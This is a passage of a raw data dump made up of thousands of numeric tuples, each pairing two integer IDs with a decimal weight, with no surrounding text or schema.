3,0.42),(4710,1592594,0.98),(4710,1592595,1.12),(4710,1592596,0.23331),(4710,1592597,0.88669),(4710,1592598,1.02669),(4710,1592599,0.42),(4710,1592600,1.12),(4710,1592601,1.37669),(4710,1592602,0.51331),(4710,1592603,1.14331),(4710,1592604,1.19),(4710,1592605,0.51331),(4734,1592605,0.51331),(4710,1592606,1.02669),(4710,1592607,1.19),(4710,1592608,0.74662),(4710,1592609,1.14331),(4710,1592610,1.33),(4710,1592611,1.09669),(4710,1592612,1.19),(4710,1592613,0.37331),(4710,1592614,1.4),(4710,1592615,1.4),(4710,1592616,0.37331),(4938,1592616,0.37331),(4734,1592616,0.74662),(4710,1592617,1.14331),(4710,1592618,1.4),(4732,1596565,0.51331),(4734,1596565,0.51331),(4732,1596566,1.12),(4734,1596566,1.12),(4721,1602901,1.4666),(4721,1602902,2.9334),(4721,1602903,3.6666),(4721,1602921,1.4666),(4721,1602922,3.2666),(4721,1602923,4),(4721,1603148,2.05338),(4721,1603149,2.38),(4721,1603150,0.23331),(4721,1603151,0.86331),(4721,1603152,1.14331),(4721,1603153,0.37331),(4721,1603154,1.05),(4721,1603155,1.28331),(4721,1603582,0.46662),(4721,1603583,0.93331),(4721,1603584,1.14331),(4721,1603585,0.95669),(4721,1603586,1.00331),(4721,1603587,0.46669),(4721,1603588,1.02669),(4721,1603589,1.16669),(4734,1603590,0.32669),(4721,1603590,0.65338),(4721,1603591,1.09669),(4721,1603592,1.30669),(4721,1603593,0.98),(4721,1603594,1.19),(4721,1603595,0.23331),(4721,1603596,0.88669),(4721,1603597,1.21331),(4721,1603598,0.28),(4721,1603599,1.07331),(4721,1603600,1.21331),(4721,1603601,0.74662),(4721,1603602,1.00331),(4721,1603603,1.05),(4721,1603604,1.09669),(4721,1603605,1.26),(4721,1603606,0.23331),(4721,1603607,1.00331),(4721,1603608,1.14331),(4721,1603609,0.28),(4847,1603609,0.28),(4721,1603610,0.88669),(4721,1603611,1.14331),(4721,1603612,0.23331),(4721,1603613,0.86331),(4721,1603614,1.00331),(4721,1603615,0.42),(4721,1603616,1.23669),(4721,1603617,1.37669),(4721,1603618,0.37331),(4721,1603619,0.93331),(4721,1603620,1.00331),(4721,1603621,0.37331),(4721,1603622,1.14331),(4721,1603623,1.26),(4721,1603624,0.37331),(4721,1603625,1.12),(4721,1603626,1.19),(4721,1603627,0.84),(4721,1603628,1.05),(4721,1603629,1.4),(4721,1603630,1.00331),(4721,1603631,1.14331),(4721,1603632,0.28),(4721,1603633,1.05),(4721,1603634,1.23669),(4721,1603635,0.37331),(4721,1603636,0.95669),(4721,1603637,1.05),(4721,1603638,0.32669),(4721,1603639,0.93331),(4721,1603640,1.12),(4721,1603641,0.32669),(4721,1603642,1.07331),(4721,1603643,1.14331),(4721,1603644,0.32669),(4721,1603645,1.00331),(4721,1603646,1.21331),(4721,1603647,0.32669),(4721,1603648,1.09669),(4721,1603649,1.4),(4721,1603650,0.42),(4721,1603651,0.95669),(4721,1603652,1.16669),(4721,1603824,0.37338),(4721,1603825,1.05),(4721,1603826,1.21331),(4721,1603827,0.84),(4721,1603828,0.95669),(4721,1603829,0.56),(4721,1603830,2.00662),(4721,1603831,2.33338),(4721,1603832,0.42),(4721,1603833,1.00331),(4721,1603834,1.16669),(4721,1603835,0.37331),(4721,1603836,1.05),(4721,1603837,1.23669),(4734,1603838,0.18669),(4927,1603838,0.18669),(4938,1603838,0.18669),(4940,1603838,0.18669),(4721,1603838,0.37338),(4938,1603839,0.86331),(4940,1603839,0.86331),(4721,1603839,1.72662),(4721,1603840,1.05),(4721,1603841,1.00331),(4721,1603842,0.23331),(4734,1603842,0.23331),(4721,1603843,1.12),(4721,1603844,1.19),(4721,1603845,0.32669),(4721,1603846,0.91),(4721,1603847,1.09669),(4721,1603848,0.23331),(4721,1603849,1.09669),(4721,1603850,1.21331),(4734,1603851,0.23331),(4721,1603851,0.46662),(4721,1603852,1.02669),(4721,1603853,1.23669),(4721,1603854,1.07331),(4721,1603855,1.14331),(4721,1603856,0.46662),(4721,1603857,1.00331),(4721,1603858,1.05),(4721,1603859,1.00331),(4721,1603860,1.07331),(4721,1603861,0.18669),(4940,1603861,0.18669),(4721,1603862,0.93331),(4721,1603863,1.12),(4721,1603864,0.18669),(4776,1603864,0.45339),(4721,1603865,0.91),(4721,1603866,0.98),(4721,1603867,0.88669),(4721,1603868,0.93331),(4721,1603869,0.32669),(4721,1603870,1.09669),(4721,1603871,1.23669),(4721,1603872,0.88669),(4721,1603873,1.07331),(4721,1603874,4.44323),(4721,1603875,1.14331),(4721,1603876,4.24008),(4721,1603877,0.46669),(4721,1603878,1.00331),(4721,1603879,1.33),(4721,1603880,0.28),(4777,1603880,1.4),(4721,1603881,1.09669),(4721,1603882,1.4),(4721,1603883,0.28),(4721,1603884,0.88669),(4721,1603885,1.05),(4721,1603886,0.37331),(4721,1603887,1.02669),(4721,1603888,1.19),(4721,1603889,0.18669),(4721,1603890,0.91),(4721,1603891,1.19),(4721,1603892,0.18669),(4721,1603893,1.00331),(4721,1603894,1.19),(4721,1603895,0.23331),(4721,1603896,0.88669),(4721,1603897,1.12),(4721,1603898,0.42),(4721,1603899,1.00331),(4721,1603900,1.26),(4721,1603901,0.32669),(4721,1603902,0.93331),(4721,1603903,1.12),(4721,1603904,0.42),(4721,1603905,0.98),(4721,1603906,1.16669),(4721,1603907,0.46662),(4721,1603908,0.98),(4721,1603909,1.05),(4721,1603910,0.98),(4721,1603911,1.09669),(4721,1603912,0.32669),(4721,1603913,0.95669),(4721,1603914,1.28331),(4721,1603915,0.42),(4734,1603915,0.42),(4721,1603916,1.19),(4721,1603917,1.4),(4721,1603918,0.23331),(4721,1603919,1.02669),(4721,1603920,1.19),(4723,1604962,2.15339),(4727,1605087,0.79339),(4727,1605088,2.43661),(4727,1605089,2.89),(4732,1613467,0.37331),(4732,1613468,1.09669),(4732,1613469,1.30669),(4732,1613470,0.51331),(4732,1613471,1.00331),(4732,1613472,1.12),(4732,1613473,0.32669),(4732,1613474,1.09669),(4732,1613475,1.35331),(4732,1613476,0.28),(4732,1613477,1.00331),(4732,1613478,1.26),(4732,1613479,0.28),(4732,1613480,0.98),(4732,1613481,1.26),(4732,1613482,0.46669),(4732,1613483,1.00331),(4732,1613484,1.19),(4732,1613582,0.91),(4732,1613583,0.91),(4732,1613584,0.91),(4732,1613585,0.91),(4732,1613586,0.79339),(4732,1613587,0.18669),(4761,1613587,0.18669),(4732,1613588,1.05),(4761,1613588,1.05),(4732,1613589,1.09669),(4761,1613590,0.84),(4762,1613590,0.84),(4732,1613590,1.68),(4732,1613591,1.21331),(4732,1613592,1.26),(4732,1613593,1.16669),(4761,1613593,1.16669),(4762,1613593,1.16669),(4732,1613594,1.21331),(4732,1613595,1.23669),(4762,1613595,1.23669),(4732,1613596,1.4),(4732,1613597,1.12),(4732,1613598,1.16669),(4732,1613599,0.46669),(4735,1613599,1.13339),(4732,1613600,1.19),(4732,1613601,1.23669),(4732,1613602,0.23331),(4761,1613602,0.46662),(4732,1613603,1.05),(4761,1613603,1.05),(4732,1613604,1.09669),(4732,1613605,0.46669),(4732,1613606,1.12),(4732,1613607,1.4),(4732,1613608,1.23669),(4732,1613609,0.32669),(4732,1613610,1.09669),(4732,1613611,1.4),(4762,1613649,0.37331),(4732,1613649,0.74662),(4732,1613650,1.14331),(4732,1613651,1.19),(4732,1613652,1.09669),(4732,1613653,1.14331),(4732,1613654,0.68),(4732,1613655,2.66339),(4732,1613656,2.77661),(4732,1613657,0.42),(4732,1613658,1.07331),(4732,1613659,1.26),(4734,1616269,0.46669),(4734,1616270,1.00331),(4734,1616271,1.07331),(4734,1616272,0.37331),(4734,1616273,0.95669),(4734,1616274,1.02669),(4734,1616275,0.51331),(4734,1616276,1.26),(4734,1616277,1.4),(4734,1616278,0.28),(4734,1616279,1.07331),(4734,1616280,1.28331),(4734,1616281,0.28),(4762,1616281,0.28),(4761,1616281,0.84),(4734,1616282,0.88669),(4734,1616283,1.07331),(4734,1616284,0.28),(4761,1616284,0.28),(4734,1616285,1.02669),(4734,1616286,1.14331),(4734,1616287,0.65338),(4734,1616288,2.19338),(4734,1616289,2.42662),(4734,1616290,1.09669),(4734,1616291,1.37669),(4734,1616292,0.51331),(4761,1616292,0.51331),(4734,1616293,1.00331),(4734,1616294,1.33),(4734,1616295,0.98),(4734,1616296,1.09669),(4734,1616297,1.44677),(4734,1616298,0.91),(4734,1616299,1.00331),(4734,1616300,1.09669),(4734,1616301,1.28331),(4734,1616302,2.72),(4734,1616303,3.4),(4734,1616304,1.63345),(4734,1616305,0.91),(4734,1616306,0.95669),(4734,1616307,1.00331),(4734,1616308,1.23669),(4734,1616309,1.09669),(4734,1616310,1.26),(4734,1616311,1.07331),(4734,1616312,1.12),(4734,1616313,0.93331),(4734,1616314,1.23669),(4734,1616315,0.56),(4734,1616316,1.16669),(4734,1616317,1.26),(4734,1616973,1.44),(4734,1616974,2.32339),(4734,1616975,2.89),(4734,1616976,0.98),(4734,1616977,1.12),(4734,1616978,1.07331),(4734,1616979,1.26),(4734,1616980,0.32669),(4734,1616981,1.07331),(4734,1616982,1.19),(4734,1616983,0.37331),(4734,1616984,0.93331),(4734,1616985,1.12),(4734,1616986,0.32669),(4734,1616987,0.98),(4734,1616988,1.16669),(4734,1616989,0.65331),(4734,1616990,1.28331),(4734,1616991,1.4),(4734,1616992,0.32669),(4734,1616993,1.07331),(4734,1616994,1.26),(4734,1616995,0.98),(4734,1616996,1.12),(4734,1616997,0.46669),(4734,1616998,1.19),(4734,1616999,1.33),(4734,1617000,0.93331),(4734,1617001,1.00331),(4734,1617002,0.46669),(4734,1617003,1.02669),(4734,1617004,1.14331),(4734,1617005,1.09669),(4734,1617006,1.4),(4734,1617007,1.4),(4734,1617008,0.32669),(4734,1617009,1.09669),(4734,1617010,1.4),(4734,1617011,0.32669),(4734,1617012,1.02669),(4734,1617013,1.19),(4734,1617014,0.32669),(4734,1617015,0.98),(4734,1617016,1.05),(4734,1617335,0.81669),(4734,1617336,0.88669),(4734,1617337,0.37331),(4734,1617338,1.07331),(4734,1617339,1.21331),(4734,1617340,0.42),(4761,1617340,0.42),(4734,1617341,1.07331),(4761,1617341,1.07331),(4734,1617342,1.12),(4734,1617343,1.07331),(4734,1617344,1.21331),(4734,1617345,1.14331),(4734,1617346,1.30669),(4734,1617347,2.00662),(4734,1617348,1.12),(4734,1617349,1.12),(4734,1617350,2.05338),(4734,1617351,1.07331),(4734,1617352,1.16669),(4734,1617353,0.98),(4734,1617354,1.02669),(4734,1617355,1.00331),(4734,1617356,1.21331),(4734,1617357,0.42),(4734,1617358,0.95669),(4734,1617359,1.16669),(4734,1617360,1.30662),(4734,1617361,1.19),(4734,1617362,1.33),(4734,1617363,1.14331),(4734,1617364,1.4),(4734,1617365,0.37331),(4734,1617366,0.95669),(4734,1617367,1.02669),(4734,1617368,0.23331),(4734,1617369,1.00331),(4734,1617370,1.21331),(4849,1617371,0.18669),(4734,1617371,0.37338),(4734,1617372,0.95669),(4734,1617373,1.19),(4734,1617374,0.91),(4734,1617375,0.98),(4734,1617376,1.02669),(4734,1617377,1.19),(4734,1617378,0.86331),(4734,1617379,1.16669),(4734,1617380,0.18669),(4734,1617381,0.93331),(4734,1617382,1.00331),(4734,1617383,0.93345),(4734,1617384,0.88669),(4734,1617385,0.93331),(4734,1617386,0.95669),(4734,1617387,1.00331),(4734,1617388,0.93331),(4734,1617389,0.98),(4734,1617390,0.91),(4734,1617391,1.07331),(4734,1617392,0.86331),(4734,1617393,0.91),(4734,1617394,0.93345),(4734,1617395,1.07331),(4734,1617396,1.12),(4734,1617397,0.95669),(4734,1617398,1.09669),(4734,1617399,0.91),(4734,1617400,1.00331),(4734,1617401,1.02669),(4734,1617402,1.07331),(4734,1617403,0.84),(4734,1617404,0.88669),(4734,1617405,0.23331),(4734,1617406,1.02669),(4734,1617407,1.07331),(4734,1617408,0.18669),(4734,1617409,0.86331),(4734,1617410,1.09669),(4734,1617411,0.32669),(4734,1617412,1.05),(4734,1617413,1.14331),(4734,1617414,0.23331),(4734,1617415,0.86331),(4734,1617416,0.93331),(4734,1617417,0.28),(4734,1617418,1.23669),(4734,1617419,1.4),(4734,1617420,0.23331),(4927,1617420,0.23331),(4734,1617421,0.91),(4734,1617422,0.98),(4734,1617423,0.18669),(4734,1617424,0.86331),(4734,1617425,1.02669),(4734,1617426,0.37331),(4734,1617427,1.16669),(4734,1617428,1.37669),(4734,1617429,0.51331),(4734,1617430,1.16669),(4734,1617431,1.23669),(4734,1617432,0.32669),(4734,1617433,1.00331),(4734,1617434,1.09669),(4734,1617435,0.60669),(4734,1617436,1.14331),(4734,1617437,1.4),(4734,1617438,0.56),(4734,1617439,1.23669),(4734,1617440,1.4),(4734,1617441,0.23331),(4734,1617442,1.00331),(4734,1617443,1.19),(4734,1617444,0.28),(4734,1617445,1.05),(4734,1617446,1.23669),(4734,1617447,0.28),(4734,1617448,0.88669),(4734,1617449,1.02669),(4734,1617450,0.56),(4734,1617451,1.02669),(4734,1617452,1.21331),(4734,1617453,0.28),(4734,1617454,1.00331),(4734,1617455,1.23669),(4734,1617456,0.23331),(4734,1617457,0.91),(4734,1617458,1.07331),(4734,1617459,0.23331),(4734,1617460,1.07331),(4734,1617461,1.16669),(4734,1617462,0.42),(4734,1617463,1.02669),(4734,1617464,1.07331),(4734,1617465,0.28),(4734,1617466,1.12),(4734,1617467,1.26),(4734,1617468,0.37331),(4762,1617468,0.37331),(4734,1617469,1.05),(4734,1617470,1.12),(4734,1617471,0.37331),(4734,1617472,1.00331),(4734,1617473,1.23669),(4734,1617474,0.60669),(4734,1617475,1.16669),(4734,1617476,1.26),(4734,1617477,0.42),(4734,1617478,1.09669),(4734,1617479,1.30669),(4734,1617480,0.37331),(4734,1617481,1.00331),(4734,1617482,1.12),(4734,1617483,0.23331),(4927,1617483,0.23331),(4734,1617484,1.05),(4734,1617485,1.35331),(4734,1617486,1.09669),(4734,1617487,1.23669),(4734,1617488,0.37331),(4734,1617489,1.05),(4734,1617490,1.16669),(4734,1617491,0.32669),(4734,1617492,0.91),(4734,1617493,1.02669),(4734,1617494,0.28),(4734,1617495,0.88669),(4734,1617496,0.95669),(4734,1617497,1.12),(4734,1617498,1.26),(4734,1617499,0.28),(4734,1617500,1.07331),(4734,1617501,1.19),(4734,1617502,0.46669),(4734,1617503,1.05),(4734,1617504,1.21331),(4734,1617505,0.93331),(4734,1617506,1.07331),(4734,1617507,1.02669),(4734,1617508,1.09669),(4735,1617928,1.0666),(4735,1617929,2.7334),(4735,1617930,3.1334),(4735,1617931,0.9334),(4735,1617932,2.8),(4735,1617933,3.2),(4735,1617934,0.8),(4735,1617935,2.8666),(4735,1617936,3),(4761,1617951,0.23331),(4917,1617951,0.23331),(4735,1617951,0.56661),(4804,1617951,0.56661),(4735,1617952,2.15339),(4735,1617953,2.60661),(4735,1617954,1.24661),(4735,1617955,2.94661),(4735,1617956,3.23),(4735,1617957,1.24661),(4735,1617960,2.94661),(4735,1617963,0.45339),(4735,1617964,2.26661),(4735,1617965,2.43661),(4735,1617966,0.79339),(4735,1617967,2.72),(4735,1617968,3.4),(4736,1618034,2.7334),(4736,1618035,3.0666),(4736,1618036,2.6),(4736,1618037,3.6),(4736,1618038,0.9334),(4929,1618038,1.8668),(4736,1618039,3.2),(4736,1618040,3.5334),(4849,1618048,0.37338),(4736,1618048,0.45339),(4940,1618048,0.56007),(4927,1618048,0.82677),(4938,1618048,1.12014),(4803,1618048,1.20015),(4849,1618049,0.84),(4736,1618049,2.04),(4736,1618050,2.60661),(4761,1620424,0.28),(4762,1620424,0.28),(4762,1620427,0.98),(4761,1620427,2.94),(4762,1620428,1.23669),(4761,1620428,3.71007),(4762,1620438,0.37331),(4761,1620438,1.49324),(4761,1620441,0.56),(4762,1620441,0.56),(4761,1620444,0.37331),(4762,1620444,0.37331),(4762,1620447,5.13359),(4761,1620447,9.80049),(4762,1620448,12.32),(4761,1620448,23.52),(4762,1620449,14.8864),(4761,1620449,28.4195),(4762,1620450,5.13359),(4761,1620450,5.60028),(4762,1620451,12.32),(4761,1620451,13.44),(4762,1620452,15.1436),(4761,1620452,16.5203),(4762,1620692,0.93338),(4761,1620692,3.73352),(4762,1620693,2.42662),(4761,1620693,8.49317),(4762,1620696,3.08),(4761,1620696,4.76),(4762,1620725,0.32669),(4761,1620725,0.98007),(4762,1620726,1.09669),(4761,1620726,3.29007),(4761,1620728,0.37331),(4762,1620728,0.37331),(4927,1620728,0.37331),(4761,1620729,1.09669),(4762,1620729,1.09669),(4761,1620734,0.28),(4762,1620734,0.28),(4762,1620745,0.51331),(4761,1620745,1.02662),(4762,1620746,1.07331),(4761,1620746,2.14662),(4762,1620747,1.28331),(4761,1620747,2.56662),(4762,1620748,6.16),(4761,1620748,9.52),(4762,1620749,11.4803),(4761,1620749,29.6574),(4762,1620750,4.94676),(4761,1620750,8.65683),(4762,1620751,10.08),(4761,1620751,18.9),(4761,1620752,1.05),(4762,1620752,2.1),(4761,1620753,1.23669),(4762,1620753,2.47338),(4761,1620754,2.05338),(4762,1620754,8.21352),(4761,1620755,2.56662),(4762,1620755,10.2665),(4762,1620878,0.37331),(4761,1620878,0.74662),(4762,1620879,1.00331),(4761,1620879,2.00662),(4762,1620899,0.28),(4909,1620899,0.28),(4761,1620899,0.56),(4761,1620902,0.98007),(4762,1620902,3.2669),(4761,1620903,1.14331),(4762,1620903,2.28662),(4761,1620906,2.24),(4762,1620906,8.96),(4761,1620907,1.4),(4762,1620907,7),(4761,1620921,0.69993),(4762,1620921,0.69993),(4761,1620922,2.94),(4762,1620922,2.94),(4762,1620926,1.68),(4761,1620926,3.36),(4761,1620931,0.46669),(4762,1620931,0.46669),(4761,1620932,1.12),(4762,1620932,1.12),(4761,1620934,0.93338),(4762,1620934,3.73352),(4761,1620935,1.21331),(4762,1620935,6.06655),(4857,1621228,0.28),(4741,1621228,0.68),(4749,1621228,0.68),(4813,1621228,0.68),(4749,1623518,1.02669),(4753,1623648,1.02669),(4759,1623825,2.5334),(4759,1623831,0.68),(4759,1623832,2.26661),(4759,1623833,2.38),(4759,1623834,0.79339),(4764,1623834,0.79339),(4759,1623835,2.49339),(4759,1623836,2.72),(4761,1626503,0.42),(4761,1626504,1.02669),(4761,1626505,1.16669),(4761,1626506,0.42),(4761,1626507,1.05),(4761,1626508,1.26),(4761,1626509,1.09669),(4761,1626510,1.35331),(4761,1626511,0.51331),(4761,1626512,1.16669),(4761,1626513,1.30669),(4761,1626514,0.56),(4761,1626515,1.21331),(4761,1626516,1.35331),(4761,1626517,0.98),(4761,1626518,1.23669),(4761,1626519,1.12),(4761,1626520,1.26),(4761,1626521,2.24),(4761,1626522,2.52),(4761,1626523,1.14331),(4761,1626524,1.33),(4761,1626525,0.91),(4761,1626526,0.95669),(4761,1626527,0.65338),(4761,1626528,0.93331),(4761,1626529,1.02669),(4761,1626530,1.05),(4761,1626531,1.12),(4761,1626532,1.09669),(4761,1626533,1.35331),(4761,1626534,0.46669),(4761,1626535,1.09669),(4761,1626536,1.35331),(4761,1626537,1.21331),(4761,1626538,1.26),(4761,1626539,0.37331),(4761,1626540,1.21331),(4761,1626541,1.30669),(4761,1626542,0.93338),(4761,1626543,1.19),(4761,1626544,1.37669),(4761,1626545,1.35331),(4761,1626546,1.4),(4761,1626547,1.09669),(4761,1626548,1.37669),(4761,1626549,0.7),(4761,1626550,1.4),(4761,1626551,1.4),(4761,1626552,0.7),(4761,1626553,1.33),(4761,1626554,1.4),(4761,1626555,0.32669),(4761,1626556,1.00331),(4761,1626557,1.26),(4761,1626971,1.33),(4761,1626972,1.26),(4761,1626973,2.8),(4761,1626974,1.37669),(4761,1626975,2.61338),(4761,1626976,1.12),(4761,1626977,1.21331),(4761,1626978,0.46669),(4761,1626979,1.00331),(4761,1626980,1.28331),(4761,1626981,0.86331),(4761,1626982,1.00331),(4761,1626983,0.86331),(4761,1626984,1.00331),(4761,1626985,0.86331),(4761,1626986,1.00331),(4761,1626987,0.86331),(4761,1626988,1.00331),(4761,1626989,1.72662),(4761,1626990,2.00662),(4761,1626991,0.86331),(4761,1626992,1.00331),(4761,1626993,0.86331),(4761,1626994,1.00331),(4761,1626995,1.68),(4761,1626996,1.91338),(4761,1626997,0.86331),(4761,1626998,1.00331),(4761,1626999,0.86331),(4761,1627000,1.00331),(4761,1627001,0.86331),(4761,1627002,1.00331),(4761,1627003,0.86331),(4761,1627004,1.00331),(4761,1627005,0.86331),(4761,1627006,1.00331),(4761,1627007,0.86331),(4761,1627008,1.00331),(4761,1627009,1.68),(4761,1627010,1.91338),(4761,1627011,0.84),(4761,1627012,0.98),(4761,1627013,0.84),(4761,1627014,0.98),(4761,1627015,0.84),(4761,1627016,0.98),(4761,1627017,0.84),(4761,1627018,0.98),(4761,1627019,1.68),(4761,1627020,1.96),(4761,1627021,0.86331),(4761,1627022,1.02669),(4761,1627023,0.84),(4761,1627024,0.98),(4761,1627025,0.84),(4761,1627026,0.98),(4761,1627027,0.84),(4761,1627028,0.98),(4761,1627029,0.84),(4761,1627030,0.98),(4761,1627031,4.43345),(4761,1627032,4.66655),(4761,1627033,1.30669),(4761,1627034,2.61338),(4761,1627035,0.28),(4761,1627036,1.07331),(4761,1627037,1.23669),(4761,1627038,1.28331),(4761,1627039,0.86331),(4761,1627040,1.00331),(4761,1627041,0.28),(4761,1627042,1.07331),(4761,1627043,1.12),(4761,1627044,1.07331),(4761,1627045,1.33),(4761,1627046,1.30669),(4761,1627047,0.23331),(4761,1627048,0.95669),(4761,1627049,1.05),(4761,1627050,0.32669),(4761,1627051,1.12),(4761,1627052,1.37669),(4761,1627053,1.4),(4761,1627054,1.16669),(4761,1627055,1.4),(4761,1627056,0.60669),(4761,1627057,1.26),(4761,1627058,1.4),(4761,1627059,0.23331),(4761,1627060,1.14331),(4761,1627061,1.4),(4761,1627062,1.30669),(4761,1627063,1.07331),(4761,1627064,1.33),(4761,1627065,0.18669),(4761,1627066,0.93331),(4761,1627067,1.19),(4761,1627068,0.37331),(4761,1627069,1.09669),(4761,1627070,1.28331),(4761,1627071,0.46669),(4761,1627072,1.16669),(4761,1627073,1.23669),(4761,1627074,0.37331),(4761,1627075,0.98),(4761,1627076,1.02669),(4761,1627077,0.51331),(4761,1627078,1.21331),(4761,1627079,1.37669),(4761,1627080,0.18669),(4761,1627081,0.95669),(4761,1627082,1.09669),(4761,1627083,9.65979),(4761,1627084,0.23331),(4761,1627085,0.98),(4761,1627086,1.12),(4761,1627087,0.7),(4761,1627088,1.23669),(4761,1627089,1.4),(4761,1627090,0.42),(4761,1627091,1.21331),(4761,1627092,1.4),(4761,1627262,0.91),(4761,1627263,1.23669),(4761,1627264,0.93331),(4761,1627265,1.33),(4761,1627266,0.84),(4761,1627267,1.02669),(4761,1627268,0.91),(4761,1627269,1.23669),(4761,1627270,0.93331),(4761,1627271,1.26),(4761,1627272,0.95669),(4761,1627273,1.21331),(4761,1627274,1.23669),(4761,1627275,1.28331),(4761,1627276,1.21331),(4761,1627277,0.74662),(4761,1627278,0.95669),(4761,1627279,1.00331),(4761,1627280,1.05),(4761,1627281,1.26),(4761,1627282,0.42),(4761,1627283,1.07331),(4761,1627284,1.28331),(4761,1627285,0.56),(4761,1627286,1.19),(4761,1627287,1.4),(4761,1627288,0.32669),(4761,1627289,0.95669),(4761,1627290,1.00331),(4761,1627291,0.28),(4761,1627292,1.05),(4761,1627293,1.26),(4761,1627294,1.09669),(4761,1627295,1.35331),(4761,1627296,1.05),(4761,1627297,1.30669),(4761,1627298,1.23669),(4761,1627299,1.23669),(4761,1627300,0.28),(4761,1627301,0.98),(4761,1627302,1.23669),(4761,1627303,0.32669),(4761,1627304,1.09669),(4761,1627305,1.35331),(4761,1627306,0.37331),(4761,1627307,1.02669),(4761,1627308,1.28331),(4761,1627309,0.95669),(4761,1627310,1.19),(4761,1627311,1.02669),(4761,1627312,1.07331),(4761,1627313,1.14331),(4761,1627314,0.14),(4761,1627315,0.98),(4761,1627316,1.30669),(4761,1627317,0.46669),(4761,1627318,1.05),(4761,1627319,1.28331),(4761,1627320,1.09669),(4761,1627321,1.14331),(4761,1627322,1.02669),(4761,1627323,1.16669),(4761,1627324,1.21331),(4761,1627325,1.35331),(4761,1627326,1.14331),(4761,1627327,1.35331),(4761,1627328,1.21331),(4761,1627329,1.28331),(4761,1627330,1.07331),(4761,1627331,1.26),(4761,1627332,1.4),(4761,1627333,1.4),(4761,1627334,1.05),(4761,1627335,1.30669),(4761,1627336,0.37331),(4761,1627337,1.02669),(4761,1627338,1.28331),(4761,1627339,0.32669),(4761,1627340,1.00331),(4761,1627341,1.26),(4761,1627342,1.12),(4761,1627343,1.09669),(4761,1627344,1.4),(4761,1627345,1.19),(4761,1627346,1.33),(4761,1627347,0.56),(4761,1627348,1.05),(4761,1627349,1.19),(4761,1627350,1.07331),(4761,1627351,1.33),(4761,1627352,0.60669),(4761,1627353,1.33),(4761,1627354,1.4),(4762,1628213,1.05),(4762,1628214,1.28331),(4762,1628215,0.56),(4762,1628216,1.07331),(4762,1628217,1.26),(4762,1628218,0.60669),(4762,1628219,1.09669),(4762,1628220,1.35331),(4762,1628221,0.65338),(4762,1628222,2.24),(4762,1628223,2.42662),(4762,1628224,1.02669),(4762,1628225,1.16669),(4762,1628226,1.12),(4762,1628227,1.30669),(4762,1628228,0.93331),(4762,1628229,0.98),(4762,1628427,0.86331),(4762,1628428,1.12),(4762,1628429,0.77),(4762,1628430,0.91),(4762,1628431,1.26),(4762,1628432,1.4),(4762,1628433,1.63338),(4762,1628434,1.07331),(4762,1628435,1.02669),(4762,1628436,3.26676),(4762,1628437,0.95669),(4762,1628438,2.1),(4762,1628439,1.02669),(4762,1628440,1.63338),(4762,1628441,1.00331),(4762,1628442,1.02669),(4762,1628443,1.63338),(4762,1628444,1.12),(4762,1628445,1.00331),(4762,1628446,3.26676),(4762,1628447,1.09669),(4762,1628448,1.05),(4762,1628449,1.09669),(4762,1628450,1.05),(4762,1628451,1.63338),(4762,1628452,1.07331),(4762,1628453,1.02669),(4762,1628454,2.45007),(4762,1628455,1.05),(4762,1628456,1.07331),(4762,1628457,1.02669),(4762,1628458,1.63338),(4762,1628459,1.02669),(4762,1628460,1.09669),(4762,1628461,1.33),(4762,1628462,1.14331),(4762,1628463,0.14),(4762,1628464,0.98),(4762,1628465,1.09669),(4762,1628466,1.16669),(4762,1628467,1.4),(4762,1628468,1.4),(4762,1628469,1.4),(4762,1628470,1.21338),(4762,1628471,2.47338),(4762,1628472,2.8),(4762,1628473,0.51331),(4762,1628474,1.16669),(4762,1628475,1.4),(4762,1628476,0.32669),(4762,1628477,1.00331),(4762,1628478,1.14331),(4762,1628536,1.86662),(4762,1628537,1.16669),(4762,1628538,1.19),(4762,1628539,0.93331),(4762,1628540,1.19),(4762,1628541,1.82),(4762,1628542,2.33338),(4762,1628543,0.93331),(4762,1628544,1.19),(4762,1628545,2.87007),(4762,1628546,3.63993),(4762,1628547,2.05338),(4762,1628548,2.56662),(4762,1628549,1.82),(4762,1628550,2.33338),(4762,1628551,0.86331),(4762,1628552,1.12),(4762,1628553,1.30683),(4762,1628554,7.02317),(4762,1628555,8.82),(4762,1628556,1.21331),(4762,1628557,1.82007),(4762,1628558,1.05),(4762,1628559,1.16669),(4762,1628560,1.26),(4762,1628561,1.4),(4762,1628562,1.23669),(4762,1628563,1.4),(4762,1628564,1.14331),(4762,1628565,1.37669),(4762,1628566,0.74662),(4762,1628567,2.05338),(4762,1628568,2.56662),(4762,1628569,1.30676),(4762,1628570,3.92),(4762,1628571,1.21331),(4762,1628572,1.19),(4762,1628573,1.23669),(4762,1628574,1.19),(4762,1628575,1.12),(4762,1628576,1.35331),(4762,1628577,1.37669),(4762,1628578,1.23669),(4762,1628579,4.2),(4762,1628580,0.56),(4762,1628581,1.19),(4762,1628582,1.30669),(4762,1628583,0.56),(4762,1628584,1.19),(4762,1628585,1.33),(4762,1628586,0.65338),(4762,1628587,2.24),(4762,1628588,2.42662),(4762,1628589,0.23331),(4762,1628590,1.00331),(4762,1628591,1.16669),(4762,1628592,1.02669),(4762,1628593,1.23669),(4762,1628594,1.23669),(4762,1628595,1.02669),(4762,1628596,1.14331),(4762,1628597,2.47338),(4762,1628598,2.8),(4762,1628599,1.35331),(4762,1628600,1.4),(4762,1628601,1.4),(4762,1628602,1.30669),(4762,1628603,2.8),(4762,1628604,3.71007),(4762,1628605,1.30669),(4762,1628606,1.4),(4762,1628607,1.33),(4762,1628608,1.02669),(4762,1628609,1.28331),(4764,1629041,0.5334),(4806,1629041,0.5334),(4764,1629042,3),(4764,1629043,3.6666),(4764,1629062,2.32339),(4764,1629063,2.89),(4764,1629064,2.21),(4839,1629096,0.23331),(4839,1629097,1.07331),(4767,1629133,2.32339),(4773,1629279,2.5334),(4773,1629280,2.9334),(4954,1629285,0.90661),(4773,1629285,0.90661),(4814,1629285,0.90661),(4931,1629285,0.90661),(4773,1629286,2.26661),(4773,1629287,2.66339),(4776,1629337,1.0666),(4776,1629338,3.3334),(4776,1629339,3.7334),(4777,1629351,0.5334),(4777,1629352,2.4666),(4777,1629353,2.8666),(4777,1629367,0.8),(4777,1629444,0.32669),(4777,1629445,1.12),(4777,1629446,1.33),(4777,1629447,0.95669),(4777,1629448,1.16669),(4777,1629449,0.32669),(4777,1629450,1.02669),(4777,1629451,1.19),(4777,1629452,0.23331),(4777,1629453,1.00331),(4777,1629454,1.16669),(4777,1629455,0.28),(4777,1629456,0.98),(4777,1629457,1.23669),(4777,1629458,0.42),(4777,1629459,1.05),(4777,1629460,1.16669),(4777,1629461,0.23331),(4777,1629462,0.91),(4777,1629463,1.0